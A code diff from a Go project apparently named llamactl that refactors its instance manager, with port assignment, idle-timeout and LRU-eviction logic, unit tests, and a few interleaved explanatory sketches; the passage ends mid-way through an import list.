currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
}
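// Worked example of the helpers above, assuming PortRange = [8000, 9000]:
// - options without a port: getPortFromOptions returns 0, getNextAvailablePort
// hands out the first free port (8000 on a fresh manager), setPortInOptions
// writes it back into the backend options, and ports[8000] is marked used.
// - options with Port = 8080 while 8080 is already in im.ports: creation fails
// with "port 8080 is already in use" and nothing is marked.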

View File

@@ -0,0 +1,237 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"strings"
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(backendConfig, cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
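Note: the tests above call a createTestManager helper that is defined elsewhere in this file and not visible in this hunk. A minimal sketch of what it presumably looks like after the refactor, built only from the config fields and constructor that do appear in this diff (the concrete field values are guesses, not taken from the source):

func createTestManager() manager.InstanceManager {
	backendConfig := config.BackendConfig{
		LlamaCpp: config.BackendSettings{Command: "llama-server"},
		MLX:      config.BackendSettings{Command: "mlx_lm.server"},
	}
	cfg := config.InstancesConfig{
		PortRange:            [2]int{8000, 9000}, // assumed defaults for tests
		MaxInstances:         10,
		TimeoutCheckInterval: 5,
	}
	return manager.NewInstanceManager(backendConfig, cfg)
}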

pkg/manager/timeout.go (new file, 64 lines)

@@ -0,0 +1,64 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"log"
)
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
var timeoutInstances []string
// Identify instances that should timeout
for _, inst := range im.instances {
if inst.ShouldTimeout() {
timeoutInstances = append(timeoutInstances, inst.Name)
}
}
im.mu.RUnlock() // Release read lock before calling StopInstance
// Stop the timed-out instances
for _, name := range timeoutInstances {
log.Printf("Instance %s has timed out, stopping it", name)
if _, err := im.StopInstance(name); err != nil {
log.Printf("Error stopping instance %s: %v", name, err)
} else {
log.Printf("Instance %s stopped successfully", name)
}
}
}
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
im.mu.RLock()
var lruInstance *instance.Process
for name := range im.runningInstances {
inst := im.instances[name]
if inst == nil {
continue
}
if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
continue // Skip instances with idle timeout explicitly disabled (timeout <= 0)
}
if lruInstance == nil {
lruInstance = inst
}
if inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
im.mu.RUnlock()
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict Instance
_, err := im.StopInstance(lruInstance.Name)
return err
}
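checkAllTimeouts is not invoked anywhere in this hunk; presumably the manager drives it from a background ticker keyed to TimeoutCheckInterval. A sketch of such a loop, assuming a "time" import and a stop channel that are not part of this file (method and parameter names here are illustrative only):

// Illustrative sketch, not part of the diff: a background loop that could
// periodically call checkAllTimeouts until the manager shuts down.
func (im *instanceManager) runTimeoutChecker(interval time.Duration, stop <-chan struct{}) {
	ticker := time.NewTicker(interval)
	defer ticker.Stop()
	for {
		select {
		case <-ticker.C:
			im.checkAllTimeouts()
		case <-stop:
			return
		}
	}
}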

pkg/manager/timeout_test.go (new file, 332 lines)

@@ -0,0 +1,332 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
MLX: config.BackendSettings{Command: "mlx_lm.server"},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(backendConfig, cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.SetStatus(instance.Stopped)
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager()
// Don't defer manager.Shutdown() - we'll handle cleanup manually
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model1.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model3.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
inst1, err := manager.CreateInstance("instance-1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst2, err := manager.CreateInstance("instance-2", options2)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst3, err := manager.CreateInstance("instance-3", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
err = manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
// Clean up manually - set all to stopped and then shutdown
inst2.SetStatus(instance.Stopped)
inst3.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
// Helper function to create instances with different timeout configurations
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Process {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: model,
},
IdleTimeout: timeout,
}
inst, err := manager.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
t.Run("no running instances", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
})
t.Run("only instances without timeout", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create instances with various non-eligible timeout configurations
zeroTimeout := 0
negativeTimeout := -1
inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
// Set instances to running
instances := []*instance.Process{inst1, inst2, inst3}
for _, inst := range instances {
inst.SetStatus(instance.Running)
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
inst.SetStatus(instance.Stopped)
}
}()
// Try to evict - should fail because no eligible instances
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no eligible instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
// Verify all instances are still running
for i, inst := range instances {
if !inst.IsRunning() {
t.Errorf("Expected instance %d to still be running", i+1)
}
}
})
t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}
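MockTimeProvider is injected through inst.SetTimeProvider in the tests above; the interface it satisfies lives in the instance package and is not shown in this diff. Judging from the usage, it presumably reduces to a single Now() method, roughly:

// Assumed shape of the time-provider abstraction accepted by instance.Process;
// the real definition is in pkg/instance and may differ.
type TimeProvider interface {
	Now() time.Time
}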

Deleted file (501 lines)

@@ -1,501 +0,0 @@
package llamactl_test
import (
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstanceManager(t *testing.T) {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
manager := llamactl.NewInstanceManager(config)
if manager == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
if instance.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", instance.GetOptions().Port)
}
}
func TestCreateInstance_DuplicateName(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create first instance
_, err := manager.CreateInstance("test-instance", options1)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = manager.CreateInstance("test-instance", options2)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
}
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
// Create manager with low max instances limit
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 2, // Very low limit for testing
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances up to the limit
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to max instances limit
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestCreateInstance_PortAssignment(t *testing.T) {
manager := createTestManager()
// Create instance without specifying port
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Should auto-assign a port in the range
port := instance.GetOptions().Port
if port < 8000 || port > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port)
}
}
func TestCreateInstance_PortConflictDetection(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080, // Explicit port
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: 8080, // Same port - should conflict
},
}
// Create first instance
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// Try to create second instance with same port
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
}
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create multiple instances and verify they get different ports
instance1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
instance2, err := manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
port1 := instance1.GetOptions().Port
port2 := instance2.GetOptions().Port
if port1 == port2 {
t.Errorf("Expected different ports, both got %d", port1)
}
}
func TestCreateInstance_PortExhaustion(t *testing.T) {
// Create manager with very small port range
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 8001}, // Only 2 ports available
MaxInstances: 10, // Higher than available ports
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances to exhaust all ports
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to port exhaustion
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when ports are exhausted")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
t.Errorf("Expected port exhaustion error, got: %v", err)
}
}
func TestDeleteInstance_PortRelease(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Create instance with specific port
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete the instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-instance", options)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestGetInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance first
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Retrieve it
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
}
func TestGetInstance_NotFound(t *testing.T) {
manager := createTestManager()
_, err := manager.GetInstance("nonexistent")
if err == nil {
t.Error("Expected error for nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestListInstances(t *testing.T) {
manager := createTestManager()
// Initially empty
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected 0 instances, got %d", len(instances))
}
// Create some instances
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err = manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// List should return both
instances, err = manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 2 {
t.Errorf("Expected 2 instances, got %d", len(instances))
}
// Check names are present
names := make(map[string]bool)
for _, instance := range instances {
names[instance.Name] = true
}
if !names["instance1"] || !names["instance2"] {
t.Error("Expected both instance1 and instance2 in list")
}
}
func TestDeleteInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete it
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should no longer exist
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
}
func TestDeleteInstance_NotFound(t *testing.T) {
manager := createTestManager()
err := manager.DeleteInstance("nonexistent")
if err == nil {
t.Error("Expected error for deleting nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestUpdateInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Update it
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
if updated.GetOptions().Port != 8081 {
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
}
}
func TestUpdateInstance_NotFound(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.UpdateInstance("nonexistent", options)
if err == nil {
t.Error("Expected error for updating nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
// Helper function to create a test manager with standard config
func createTestManager() llamactl.InstanceManager {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
return llamactl.NewInstanceManager(config)
}


@@ -1,10 +1,17 @@
package llamactl
package server
import (
"bytes"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"net/http"
